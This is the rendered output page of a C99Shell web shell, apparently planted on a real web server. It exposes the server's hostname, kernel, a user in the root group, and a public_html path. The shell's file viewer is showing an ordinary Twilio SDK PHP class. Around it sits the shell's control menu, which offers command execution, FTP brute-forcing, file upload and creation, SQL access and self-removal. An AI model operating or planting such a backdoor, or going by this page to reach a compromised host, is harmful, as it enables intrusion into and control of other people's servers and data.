!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/Messaging/V1/   drwxrwxr-x
Free 28.66 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     DomainConfigContext.php (2.79 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Messaging\V1;

use 
Twilio\Exceptions\TwilioException;
use 
Twilio\InstanceContext;
use 
Twilio\Options;
use 
Twilio\Serialize;
use 
Twilio\Values;
use 
Twilio\Version;

/**
 * PLEASE NOTE that this class contains beta products that are subject to change. Use them with caution.
 */
class DomainConfigContext extends InstanceContext {
    
/**
     * Initialize the DomainConfigContext
     *
     * @param Version $version Version that contains the resource
     * @param string $domainSid Unique string used to identify the domain that this
     *                          config should be associated with.
     */
    
public function __construct(Version $version$domainSid) {
        
parent::__construct($version);

        
// Path Solution
        
$this->solution = ['domainSid' => $domainSid, ];

        
$this->uri '/LinkShortening/Domains/' \rawurlencode($domainSid) . '/Config';
    }

    
/**
     * Update the DomainConfigInstance
     *
     * @param string[] $messagingServiceSids A list of messagingServiceSids (with
     *                                       prefix MG)
     * @param array|Options $options Optional Arguments
     * @return DomainConfigInstance Updated DomainConfigInstance
     * @throws TwilioException When an HTTP error occurs.
     */
    
public function update(array $messagingServiceSids, array $options = []): DomainConfigInstance {
        
$options = new Values($options);

        
$data Values::of([
            
'MessagingServiceSids' => Serialize::map($messagingServiceSids, function($e) { return $e; }),
            
'FallbackUrl' => $options['fallbackUrl'],
            
'CallbackUrl' => $options['callbackUrl'],
            
'MessagingServiceSidsAction' => $options['messagingServiceSidsAction'],
        ]);

        
$payload $this->version->update('POST'$this->uri, [], $data);

        return new 
DomainConfigInstance($this->version$payload$this->solution['domainSid']);
    }

    
/**
     * Fetch the DomainConfigInstance
     *
     * @return DomainConfigInstance Fetched DomainConfigInstance
     * @throws TwilioException When an HTTP error occurs.
     */
    
public function fetch(): DomainConfigInstance {
        
$payload $this->version->fetch('GET'$this->uri);

        return new 
DomainConfigInstance($this->version$payload$this->solution['domainSid']);
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$context = [];
        foreach (
$this->solution as $key => $value) {
            
$context[] = "$key=$value";
        }
        return 
'[Twilio.Messaging.V1.DomainConfigContext ' \implode(' '$context) . ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--